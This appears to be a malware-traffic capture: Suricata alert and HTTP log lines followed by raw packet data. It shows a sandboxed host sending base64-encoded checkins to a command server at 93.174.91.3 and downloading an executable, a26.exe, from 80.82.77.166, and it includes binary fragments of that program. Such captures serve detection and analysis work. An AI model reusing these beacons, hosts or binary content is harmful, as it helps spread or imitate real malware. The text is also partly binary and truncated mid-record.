{"timestamp":"2017-05-03T18:40:54.863994+0000","flow_id":1501396618889578,"pcap_cnt":49,"event_type":"alert","src_ip":"192.168.56.19","src_port":55948,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":3,"alert":{"action":"allowed","gid":1,"signature_id":2806027,"rev":3,"signature":"ETPRO TROJAN Win32\/Aybo.A Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2017-05-03T18:40:54.863994+0000","flow_id":1501396618889578,"pcap_cnt":49,"event_type":"http","src_ip":"192.168.56.19","src_port":55948,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9WRnBzWlVoNGRWcFlWakJqYlRsMVdETk9NRmxZU1QwPQ==","http_user_agent":"DMFR","http_content_type":"text\/html"}}
{"timestamp":"2017-05-03T18:41:14.705685+0000","flow_id":1501396618889578,"pcap_cnt":51,"event_type":"fileinfo","src_ip":"93.174.91.3","src_port":80,"dest_ip":"192.168.56.19","dest_port":55948,"proto":"TCP","http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9WRnBzWlVoNGRWcFlWakJqYlRsMVdETk9NRmxZU1QwPQ==","http_user_agent":"DMFR","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":16},"app_proto":"http","fileinfo":{"filename":"\/classes\/s.php","gaps":false,"state":"CLOSED","stored":false,"size":16,"tx_id":3}}
{"timestamp":"2017-05-03T18:41:14.754072+0000","flow_id":2170818814210073,"pcap_cnt":61,"event_type":"alert","src_ip":"192.168.56.19","src_port":55950,"dest_ip":"80.82.77.166","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2016141,"rev":5,"signature":"ET INFO Executable Download from dotted-quad Host","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2017-05-03T18:41:14.754072+0000","flow_id":2170818814210073,"pcap_cnt":61,"event_type":"alert","src_ip":"192.168.56.19","src_port":55950,"dest_ip":"80.82.77.166","dest_port":80,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2020826,"rev":7,"signature":"ET CURRENT_EVENTS Potential Dridex.Maldoc Minimal Executable Request","category":"A Network Trojan was detected","severity":1}}
{"timestamp":"2017-05-03T18:41:14.769013+0000","flow_id":2170818814210073,"pcap_cnt":86,"event_type":"alert","src_ip":"80.82.77.166","src_port":80,"dest_ip":"192.168.56.19","dest_port":55950,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2018959,"rev":3,"signature":"ET POLICY PE EXE or DLL Windows file download HTTP","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"2017-05-03T18:41:14.769013+0000","flow_id":2170818814210073,"pcap_cnt":86,"event_type":"alert","src_ip":"80.82.77.166","src_port":80,"dest_ip":"192.168.56.19","dest_port":55950,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2021076,"rev":2,"signature":"ET INFO SUSPICIOUS Dotted Quad Host MZ Response","category":"Potentially Bad Traffic","severity":2}}
{"timestamp":"2017-05-03T18:41:14.963605+0000","flow_id":1501396618889578,"pcap_cnt":192,"event_type":"alert","src_ip":"192.168.56.19","src_port":55948,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":4,"alert":{"action":"allowed","gid":1,"signature_id":2806027,"rev":3,"signature":"ETPRO TROJAN Win32\/Aybo.A Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2017-05-03T18:41:14.963605+0000","flow_id":1501396618889578,"pcap_cnt":192,"event_type":"http","src_ip":"192.168.56.19","src_port":55948,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9WRnBzWlVoNGRWcFlWakJqYlRsMVdETk9NRmxZU1QwPQ==","http_user_agent":"DMFR","http_content_type":"text\/html"}}
{"timestamp":"2017-05-03T18:41:17.934516+0000","flow_id":2170818814210073,"pcap_cnt":2452,"event_type":"http","src_ip":"192.168.56.19","src_port":55950,"dest_ip":"80.82.77.166","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"80.82.77.166","url":"\/classes\/a26.exe","http_user_agent":"explorer","http_content_type":"application\/octet-stream"}}
{"timestamp":"2017-05-03T18:42:10.414096+0000","flow_id":1564358698231754,"pcap_cnt":2472,"event_type":"alert","src_ip":"192.168.56.19","src_port":55951,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2806027,"rev":3,"signature":"ETPRO TROJAN Win32\/Aybo.A Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2017-05-03T18:42:10.414096+0000","flow_id":1564358698231754,"pcap_cnt":2472,"event_type":"http","src_ip":"192.168.56.19","src_port":55951,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=WXpKV2VtTXliSFppYm5kNlQxUk5NVTFVUWpoT1ZGRjRUWGM5UFE9PQ==","http_user_agent":"DMFR","http_content_type":"text\/html"}}
{"timestamp":"2017-05-03T18:42:10.691785+0000","flow_id":1564358698231754,"pcap_cnt":2474,"event_type":"fileinfo","src_ip":"93.174.91.3","src_port":80,"dest_ip":"192.168.56.19","dest_port":55951,"proto":"TCP","http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=WXpKV2VtTXliSFppYm5kNlQxUk5NVTFVUWpoT1ZGRjRUWGM5UFE9PQ==","http_user_agent":"DMFR","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":80},"app_proto":"http","fileinfo":{"filename":"\/classes\/s.php","gaps":false,"state":"CLOSED","stored":false,"size":80,"tx_id":0}}
{"timestamp":"2017-05-03T18:42:10.983439+0000","flow_id":1564358698231754,"pcap_cnt":2475,"event_type":"alert","src_ip":"192.168.56.19","src_port":55951,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":1,"alert":{"action":"allowed","gid":1,"signature_id":2806027,"rev":3,"signature":"ETPRO TROJAN Win32\/Aybo.A Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2017-05-03T18:42:10.983439+0000","flow_id":1564358698231754,"pcap_cnt":2475,"event_type":"http","src_ip":"192.168.56.19","src_port":55951,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9iVlkwWmtjMWJHUllVbmxpTWpWbVl6TlNhR05uUFQwPQ==","http_user_agent":"DMFR","http_content_type":"text\/html"}}
{"timestamp":"2017-05-03T18:42:30.763629+0000","flow_id":1564358698231754,"pcap_cnt":2479,"event_type":"fileinfo","src_ip":"93.174.91.3","src_port":80,"dest_ip":"192.168.56.19","dest_port":55951,"proto":"TCP","http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9iVlkwWmtjMWJHUllVbmxpTWpWbVl6TlNhR05uUFQwPQ==","http_user_agent":"DMFR","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":16},"app_proto":"http","fileinfo":{"filename":"\/classes\/s.php","gaps":false,"state":"CLOSED","stored":false,"size":16,"tx_id":1}}
{"timestamp":"2017-05-03T18:42:30.962161+0000","flow_id":1564358698231754,"pcap_cnt":2480,"event_type":"alert","src_ip":"192.168.56.19","src_port":55951,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":2,"alert":{"action":"allowed","gid":1,"signature_id":2806027,"rev":3,"signature":"ETPRO TROJAN Win32\/Aybo.A Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2017-05-03T18:42:30.962161+0000","flow_id":1564358698231754,"pcap_cnt":2480,"event_type":"http","src_ip":"192.168.56.19","src_port":55951,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9iVlkwWmtjMWJHUllVbmxpTWpWbVl6TlNhR05uUFQwPQ==","http_user_agent":"DMFR","http_content_type":"text\/html"}}
{"timestamp":"2017-05-03T18:42:50.818718+0000","flow_id":1564358698231754,"pcap_cnt":2485,"event_type":"fileinfo","src_ip":"93.174.91.3","src_port":80,"dest_ip":"192.168.56.19","dest_port":55951,"proto":"TCP","http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9iVlkwWmtjMWJHUllVbmxpTWpWbVl6TlNhR05uUFQwPQ==","http_user_agent":"DMFR","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":16},"app_proto":"http","fileinfo":{"filename":"\/classes\/s.php","gaps":false,"state":"CLOSED","stored":false,"size":16,"tx_id":2}}
{"timestamp":"2017-05-03T18:42:51.021004+0000","flow_id":1564358698231754,"pcap_cnt":2486,"event_type":"alert","src_ip":"192.168.56.19","src_port":55951,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":3,"alert":{"action":"allowed","gid":1,"signature_id":2806027,"rev":3,"signature":"ETPRO TROJAN Win32\/Aybo.A Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2017-05-03T18:42:51.021004+0000","flow_id":1564358698231754,"pcap_cnt":2486,"event_type":"http

4
Y
$"
µ…*Ñ

À¨8]®[ڌP

Y
$"Y
$"
µ…

Eõ—À¨8]®[ڌPPÇEGET /classes/s.php?query=WXpKV2VtTXliSFppYm5kM1prUkZNMDFVVFQwPQ== HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded
User-Agent: DMFR
Host: 93.174.91.3
Cache-Control: no-cache

4Y
$"õ³*Ñ

À¨8]®[ڌPsY
$"Y
$"õ³
WEICÀ¨8]®[ڌPP1´GET /classes/s.php?query=WTIxV2JtRllUakJhV0VvNFVWaHNhRmx0T1RCbVJGRjNVMFpDTTFwR1VsVlhWMDQ0VTFjMU1GcFhkMnhOYW1oVFNsUkpOVXN4YUd4aU1qUnNUV3BvVTBwVVNUVkxNRTVSVmxOMFJrNVRNSGxPYW1kM1N6TlpNRXQ1VlRCTlEzTjVUR3BSZDFJd2FEWkxlVEJ5VFZSQk1FNVRkRTVUU0c5eVMzbHplVTFFVVROVVZVbHlTM2x6ZDFwRGMzaGhRM042WWxOemVVMXVUWEpMZVhSWVlWYzBNMHQ1YzNKV1ZrNUNaa1JLT0UxNlNqaFdiV3g1WkVoV2FHSkZTblpsUTBKSVkyMUdkMkZIYkdwamVVSkNXa2RHZDJSSFZuaz0= HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded
User-Agent: DMFR
Host: 93.174.91.3
Cache-Control: no-cache

4Y
$"p0*Ñ

À¨8]®[ڌP
_Y
$"Y
$"p0

CE
5WÀ¨8]®[ڌPP
ÁGET /classes/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9WRnBzWlVoNGRWcFlWakJqYlRsMVdETk9NRmxZU1QwPQ== HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded
User-Agent: DMFR
Host: 93.174.91.3
Cache-Control: no-cache

4Y
$6
.ú*Ñ

À¨8]®[ڌP
_Y
$6Y
$6
.ú

CE
5WÀ¨8]®[ڌPP
ÁGET /classes/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9WRnBzWlVoNGRWcFlWakJqYlRsMVdETk9NRmxZU1QwPQ== HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded
User-Agent: DMFR
Host: 93.174.91.3
Cache-Control: no-cache

4Y
$J˜Í

À¨8PRM¦ÚŽPY
$JY
$J˜
Es#ÒÀ¨8PRM¦ÚŽPP²˜GET /classes/a26.exe HTTP/1.1
User-Agent: explorer
Host: 80.82.77.166

4Y
$J˜ÕÚ

À¨8PRM¦ÚŽPY
$JY
$J˜
Es#ÒÀ¨8PRM¦ÚŽPP²˜GET /classes/a26.exe HTTP/1.1
User-Agent: explorer
Host: 80.82.77.166

4Y
$J»õΏ
!
PRM¦À¨8PڎY
$JY
$J»õ
êEÜiPRM¦À¨8PڎP³‹ÀPè K‹Àè"%ËÀèÏÇËÀWèþ‹ÀVè ‹Àè8ËÀè?ËÀèpfËÀèƒ,ËÀWèºð‹ÀèdEËÀQèX5‹ÀU褋ÀèI$ËÀPèü‹ÀWè¤ã‹ÀèÔ¥"ËÀèÍVËÀQèt‹ÀPè½ó
‹Àè«ãËÀè1ËÀè-ïËÀVèeá‹Àè="ËÀèý—ËÀ荓ËÀWèw•‹ÀPè·_‹ÀèPÌËÀWèž	‹ÀUèA€‹Àèڛ$ËÀ謦
ËÀPè!Ô‹ÀRèå‹Àè›&ËÀPè‚D‹ÀèGtËÀèßæ$ËÀè•NËÀè£
ËÀè+rËÀVè¥9‹ÀPèQ‹ÀPèþ"‹ÀSè·Ø‹ÀèQ°ËÀèÏ!ËÀè„÷#ËÀPèå´‹ÀQè8‹ÀPèqL‹ÀPèw­‹ÀUè‡t‹ÀPè„q‹Àè'‚%ËÀSèÄÔ‹ÀèÒ)!ËÀèÇ1ËÀUèpB‹Àè¯H
ËÀèŒ#ËÀèÁ& ËÀWèEŸ‹ÀèuSËÀUè§Ø‹Àè£'
ËÀVèæ’‹Àè±B&ËÀèa(ËÀèå&ËÀPèل
‹ÀSèaÉ
‹À%ÿâÿÁâfÂËÀ·À·ÒÁâÂÃèK÷ÿÿËÀ3ÀÐRPèm÷ÿÿPè‡÷ÿÿËÀQRPè„÷ÿÿPPè÷ÿÿèˆ÷ÿÿPèj÷ÿÿÐPèj÷ÿÿPPèƒ÷ÿÿèN÷ÿÿÐÁââÿÂÃQ‰$¿$‰¿D$‰BZÃQf‹f‰$f‹@f‰D$‹$ZËÀèkÿÿÿËÀPèqB‹ÀU‹ìQSVW‰Mü‹ú‹ðèé±ÿÿ‹Ø‹EP‹EP‹EP‹EP‹EP‹EP‹E P‹E$P‹E(P‹EüPWVè´ÿÿÿ‹ð‹Ã蟱ÿÿ‹Æ_^[Y]Â$U‹ìQSVW‰Mü‹ú‹ð葱ÿÿ‹Ø‹EP‹EP‹EP‹EP‹EP‹EP‹E P‹E$P‹EüPWVjè^ÿÿÿ‹ð‹ÃèI±ÿÿ‹Æ_^[Y] @U‹ìQSVW‹ù‹ò‰Eüh¬{@hÀ{@è·úÿÿ‹ØhÈ{@è+ýÿÿ‹Uü‰hØ{@èýÿÿ‰hð{@èýÿÿ‰ƒ>t…Ûtjj‹PSè0ýÿÿ‹U‰ë‹E3҉ƒ?t…Ûtjj‹PSèýÿÿ‹U‰ë	‹EÇ‹Ã_^[Y]ÂMagellan MSWHEELMouseZMSWHEEL_ROLLMSGMSH_WHEELSUPPORT_MSGMSH_SCROLL_LINES_MSGU‹ì3ÀUh-|@dÿ0d‰ ÿx¦F3ÀZYYd‰h4|@ÃéFÈÿÿëø]ËÀƒ-x¦F
Ãh¦Fðÿh¦Fñÿh¦Fòÿh¦Fóÿh¦Fôÿh¦Fõÿh¦Föÿh¦F÷ÿh¦Føÿh¦Fùÿh¦Fúÿh¦Fûÿh¦Füÿh¦Fýÿh¦Fþÿh¦Fÿÿh¦Fàÿh¦Fáÿh¦Fâÿh¦Fãÿh¦Fäÿh¦Fåÿh¦Fæÿh¦Fçÿh¦Fèÿh¦FéY
$JY
$J»õ
êEÜiPRM¦À¨8PڎP[-ÿh¦Fêÿh¦Fëÿh¦Fìÿh¦Fíÿh¦Fîÿh¦Fïÿh¦FÐÿh¦FÑÿh¦FÒÿh¦FÓÿh¦FÔÿh¦FÕÿh¦FÖÿh¦F×ÿh¦FØÿh¦FÙÿh¦FÚÿh¦FÛÿh¦FÜÿh¦FÝÿh¦FÞÿh¦Fßÿh¦FÀÿh¦FÁÿh¦FÂÿh¦FÃÿh¦FÄÿh¦FÅÿh¦FÆÿh¦FÇÿh¦FÈÿh¦FÉÿh¦FÊÿh¦FËÿh¦FÌÿh¦FÍÿh¦FÎÿh¦FÏÿh¦F°ÿh¦F±ÿh¦F²ÿh¦F³ÿh¦F´ÿh¦Fµÿh¦F¶ÿh¦F·ÿh¦F¸ÿh¦F¹ÿh¦Fºÿh¦F»ÿh¦F¼ÿh¦F½ÿh¦F¾ÿh¦F¿ÿh¦F ÿh¦F¡ÿh¦F¢ÿh¦F£ÿh¦F¤ÿh¦F¥ÿh¦F¦ÿh¦F§ÿh¦F¨ÿh¦F©ÿh¦FªÿU‹ì3ÀUh=@dÿ0d‰ ÿ|¦F3ÀZYYd‰hD@Ãé6Åÿÿëø]ËÀƒ-|¦F
ÃT@
	TFileNamed@
TSearchRecX

P@Ì@Ì@Þ@ø@l?@x?@|?@€?@t?@¼<@Ø<@=@
¼@	Exception4€@4€@€@l?@x?@|?@€?@t?@¼<@ØÈ@=@EHeapException€@€@è@l?@x?@|?@€?@t?@¼<@ØÈ@=@EOutOfMemory@ì€@ì€@€@l?@x?@|?@€?@t?@¼<@Ø<@=@EInOutErrorD@D@€@l?@x?@|?@€?@t?@¼<@Ø<@=@	EExternal‹Àœ@œ@ø€@l?@x?@|?@€?@t?@¼<@Ø<@=@EExternalExceptionü@ü@ø€@l?@x?@|?@€?@t?@¼<@Ø<@=@	EIntError‹ÀT‚@T‚@°@l?@x?@|?@€?@t?@¼<@Ø<@=@
EDivByZero¬‚@¬‚@°@l?@x?@|?@€?@t?@¼<@Ø<@=@ERangeErrorƒ@Y
$JY
$J»õ
êEÜiPRM¦À¨8PڎPoƒ@°@l?@x?@|?@€?@t?@¼<@Ø<@=@EIntOverflow@`ƒ@`ƒ@ø€@l?@x?@|?@€?@t?@¼<@Ø<@=@
EMathError¸ƒ@¸ƒ@ƒ@l?@x?@|?@€?@t?@¼<@Ø<@=@
EInvalidOp„@„@ƒ@l?@x?@|?@€?@t?@¼<@Ø<@=@EZeroDivideh„@h„@ƒ@l?@x?@|?@€?@t?@¼<@Ø<@=@	EOverflow‹ÀÀ„@À„@ƒ@l?@x?@|?@€?@t?@¼<@Ø<@=@
EUnderflow…@…@è@l?@x?@|?@€?@t?@¼<@ØÈ@=@EInvalidPointert…@t…@€@l?@x?@|?@€?@t?@¼<@Ø<@=@EInvalidCast@Ѕ@Ѕ@€@l?@x?@|?@€?@t?@¼<@Ø<@=@
EConvertError‹À,†@,†@ø€@l?@x?@|?@€?@t?@¼<@Ø<@=@EAccessViolation@Œ†@Œ†@ø€@l?@x?@|?@€?@t?@¼<@Ø<@=@
EPrivilegeä†@ä†@ø€@l?@x?@|?@€?@t?@¼<@Ø<@=@EStackOverflow@‡@@‡@ø€@l?@x?@|?@€?@t?@¼<@Ø<@=@	EControlC‹À˜‡@˜‡@€@l?@x?@|?@€?@t?@¼<@Ø<@=@
EVariantError‹Àô‡@ô‡@€@l?@x?@|?@€?@t?@¼<@Ø<@=@EAssertionFailed@Tˆ@Tˆ@€@l?@x?@|?@€?@t?@¼<@Ø<@=@EAbstractError°ˆ@4Y
$J»õÖÔ
PRM¦À¨8PڎY
$JY
$J»õ
êEÜiPRM¦À¨8PڎP³‹ÀPè K‹Àè"%ËÀèÏÇËÀWèþ‹ÀVè ‹Àè8ËÀè?ËÀèpfËÀèƒ,ËÀWèºð‹ÀèdEËÀQèX5‹ÀU褋ÀèI$ËÀPèü‹ÀWè¤ã‹ÀèÔ¥"ËÀèÍVËÀQèt‹ÀPè½ó
‹Àè«ãËÀè1ËÀè-ïËÀVèeá‹Àè="ËÀèý—ËÀ荓ËÀWèw•‹ÀPè·_‹ÀèPÌËÀWèž	‹ÀUèA€‹Àèڛ$ËÀ謦
ËÀPè!Ô‹ÀRèå‹Àè›&ËÀPè‚D‹ÀèGtËÀèßæ$ËÀè•NËÀè£
ËÀè+rËÀVè¥9‹ÀPèQ‹ÀPèþ"‹ÀSè·Ø‹ÀèQ°ËÀèÏ!ËÀè„÷#ËÀPèå´‹ÀQè8‹ÀPèqL‹ÀPèw­‹ÀUè‡t‹ÀPè„q‹Àè'‚%ËÀSèÄÔ‹ÀèÒ)!ËÀèÇ1ËÀUèpB‹Àè¯H
ËÀèŒ#ËÀèÁ& ËÀWèEŸ‹ÀèuSËÀUè§Ø‹Àè£'
ËÀVèæ’‹Àè±B&ËÀèa(ËÀèå&ËÀPèل
‹ÀSèaÉ
‹À%ÿâÿÁâfÂËÀ·À·ÒÁâÂÃèK÷ÿÿËÀ3ÀÐRPèm÷ÿÿPè‡÷ÿÿËÀQRPè„÷ÿÿPPè÷ÿÿèˆ÷ÿÿPèj÷ÿÿÐPèj÷ÿÿPPèƒ÷ÿÿèN÷ÿÿÐÁââÿÂÃQ‰$¿$‰¿D$‰BZÃQf‹f‰$f‹@f‰D$‹$ZËÀèkÿÿÿËÀPèqB‹ÀU‹ìQSVW‰Mü‹ú‹ðèé±ÿÿ‹Ø‹EP‹EP‹EP‹EP‹EP‹EP‹E P‹E$P‹E(P‹EüPWVè´ÿÿÿ‹ð‹Ã蟱ÿÿ‹Æ_^[Y]Â$U‹ìQSVW‰Mü‹ú‹ð葱ÿÿ‹Ø‹EP‹EP‹EP‹EP‹EP‹EP‹E P‹E$P‹EüPWVjè^ÿÿÿ‹ð‹ÃèI±ÿÿ‹Æ_^[Y] @U‹ìQSVW‹ù‹ò‰Eüh¬{@hÀ{@è·úÿÿ‹ØhÈ{@è+ýÿÿ‹Uü‰hØ{@èýÿÿ‰hð{@èýÿÿ‰ƒ>t…Ûtjj‹PSè0ýÿÿ‹U‰ë‹E3҉ƒ?t…Ûtjj‹PSèýÿÿ‹U‰ë	‹EÇ‹Ã_^[Y]ÂMagellan MSWHEELMouseZMSWHEEL_ROLLMSGMSH_WHEELSUPPORT_MSGMSH_SCROLL_LINES_MSGU‹ì3ÀUh-|@dÿ0d‰ ÿx¦F3ÀZYYd‰h4|@ÃéFÈÿÿëø]ËÀƒ-x¦F
Ãh¦Fðÿh¦Fñÿh¦Fòÿh¦Fóÿh¦Fôÿh¦Fõÿh¦Föÿh¦F÷ÿh¦Føÿh¦Fùÿh¦Fúÿh¦Fûÿh¦Füÿh¦Fýÿh¦Fþÿh¦Fÿÿh¦Fàÿh¦Fáÿh¦Fâÿh¦Fãÿh¦Fäÿh¦Fåÿh¦Fæÿh¦Fçÿh¦Fèÿh¦FéY
$JY
$J»õ
êEÜiPRM¦À¨8PڎP[-ÿh¦Fêÿh¦Fëÿh¦Fìÿh¦Fíÿh¦Fîÿh¦Fïÿh¦FÐÿh¦FÑÿh¦FÒÿh¦FÓÿh¦FÔÿh¦FÕÿh¦FÖÿh¦F×ÿh¦FØÿh¦FÙÿh¦FÚÿh¦FÛÿh¦FÜÿh¦FÝÿh¦FÞÿh¦Fßÿh¦FÀÿh¦FÁÿh¦FÂÿh¦FÃÿh¦FÄÿh¦FÅÿh¦FÆÿh¦FÇÿh¦FÈÿh¦FÉÿh¦FÊÿh¦FËÿh¦FÌÿh¦FÍÿh¦FÎÿh¦FÏÿh¦F°ÿh¦F±ÿh¦F²ÿh¦F³ÿh¦F´ÿh¦Fµÿh¦F¶ÿh¦F·ÿh¦F¸ÿh¦F¹ÿh¦Fºÿh¦F»ÿh¦F¼ÿh¦F½ÿh¦F¾ÿh¦F¿ÿh¦F ÿh¦F¡ÿh¦F¢ÿh¦F£ÿh¦F¤ÿh¦F¥ÿh¦F¦ÿh¦F§ÿh¦F¨ÿh¦F©ÿh¦FªÿU‹ì3ÀUh=@dÿ0d‰ ÿ|¦F3ÀZYYd‰hD@Ãé6Åÿÿëø]ËÀƒ-|¦F
ÃT@
	TFileNamed@
TSearchRecX

P@Ì@Ì@Þ@ø@l?@x?@|?@€?@t?@¼<@Ø<@=@
¼@	Exception4€@4€@€@l?@x?@|?@€?@t?@¼<@ØÈ@=@EHeapException€@€@è@l?@x?@|?@€?@t?@¼<@ØÈ@=@EOutOfMemory@ì€@ì€@€@l?@x?@|?@€?@t?@¼<@Ø<@=@EInOutErrorD@D@€@l?@x?@|?@€?@t?@¼<@Ø<@=@	EExternal‹Àœ@œ@ø€@l?@x?@|?@€?@t?@¼<@Ø<@=@EExternalExceptionü@ü@ø€@l?@x?@|?@€?@t?@¼<@Ø<@=@	EIntError‹ÀT‚@T‚@°@l?@x?@|?@€?@t?@¼<@Ø<@=@
EDivByZero¬‚@¬‚@°@l?@x?@|?@€?@t?@¼<@Ø<@=@ERangeErrorƒ@Y
$JY
$J»õ
êEÜiPRM¦À¨8PڎPoƒ@°@l?@x?@|?@€?@t?@¼<@Ø<@=@EIntOverflow@`ƒ@`ƒ@ø€@l?@x?@|?@€?@t?@¼<@Ø<@=@
EMathError¸ƒ@¸ƒ@ƒ@l?@x?@|?@€?@t?@¼<@Ø<@=@
EInvalidOp„@„@ƒ@l?@x?@|?@€?@t?@¼<@Ø<@=@EZeroDivideh„@h„@ƒ@l?@x?@|?@€?@t?@¼<@Ø<@=@	EOverflow‹ÀÀ„@À„@ƒ@l?@x?@|?@€?@t?@¼<@Ø<@=@
EUnderflow…@…@è@l?@x?@|?@€?@t?@¼<@ØÈ@=@EInvalidPointert…@t…@€@l?@x?@|?@€?@t?@¼<@Ø<@=@EInvalidCast@Ѕ@Ѕ@€@l?@x?@|?@€?@t?@¼<@Ø<@=@
EConvertError‹À,†@,†@ø€@l?@x?@|?@€?@t?@¼<@Ø<@=@EAccessViolation@Œ†@Œ†@ø€@l?@x?@|?@€?@t?@¼<@Ø<@=@
EPrivilegeä†@ä†@ø€@l?@x?@|?@€?@t?@¼<@Ø<@=@EStackOverflow@‡@@‡@ø€@l?@x?@|?@€?@t?@¼<@Ø<@=@	EControlC‹À˜‡@˜‡@€@l?@x?@|?@€?@t?@¼<@Ø<@=@
EVariantError‹Àô‡@ô‡@€@l?@x?@|?@€?@t?@¼<@Ø<@=@EAssertionFailed@Tˆ@Tˆ@€@l?@x?@|?@€?@t?@¼<@Ø<@=@EAbstractError°ˆ@4	Y
$J´*Ñ

À¨8]®[ڌP
_	Y
$JY
$J´

CE
5WÀ¨8]®[ڌPP
ÁGET /classes/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9WRnBzWlVoNGRWcFlWakJqYlRsMVdETk9NRmxZU1QwPQ== HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded
User-Agent: DMFR
Host: 93.174.91.3
Cache-Control: no-cache

4
Y
$‚Q*Ñ

À¨8]®[ڏP
/
Y
$‚Y
$‚Q

E
‡À¨8]®[ڏPP8¼GET /classes/s.php?query=WXpKV2VtTXliSFppYm5kNlQxUk5NVTFVUWpoT1ZGRjRUWGM5UFE9PQ== HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded
User-Agent: DMFR
Host: 93.174.91.3
Cache-Control: no-cache

4Y
$‚
*Ñ

À¨8]®[ڏP
_Y
$‚Y
$‚


CE
5WÀ¨8]®[ڏPPSGET /classes/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9iVlkwWmtjMWJHUllVbmxpTWpWbVl6TlNhR05uUFQwPQ== HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded
User-Agent: DMFR
Host: 93.174.91.3
Cache-Control: no-cache

4Y
$–®q*Ñ

À¨8]®[ڏP
_Y
$–Y
$–®q

CE
5WÀ¨8]®[ڏPPSGET /classes/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9iVlkwWmtjMWJHUllVbmxpTWpWbVl6TlNhR05uUFQwPQ== HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded
User-Agent: DMFR
Host: 93.174.91.3
Cache-Control: no-cache

4
Y
$«R*Ñ

À¨8]®[ڏP
_
Y
$«Y
$«R

CE
5WÀ¨8]®[ڏPPSGET /classes/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9iVlkwWmtjMWJHUllVbmxpTWpWbVl6TlNhR05uUFQwPQ== HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded
User-Agent: DMFR
Host: 93.174.91.3
Cache-Control: no-cache

4Y
$¿
7ä*Ñ

À¨8]®[ڏP
_Y
$¿Y
$¿
7ä

CE
5WÀ¨8]®[ڏPPSGET /classes/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9iVlkwWmtjMWJHUllVbmxpTWpWbVl6TlNhR05uUFQwPQ== HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded
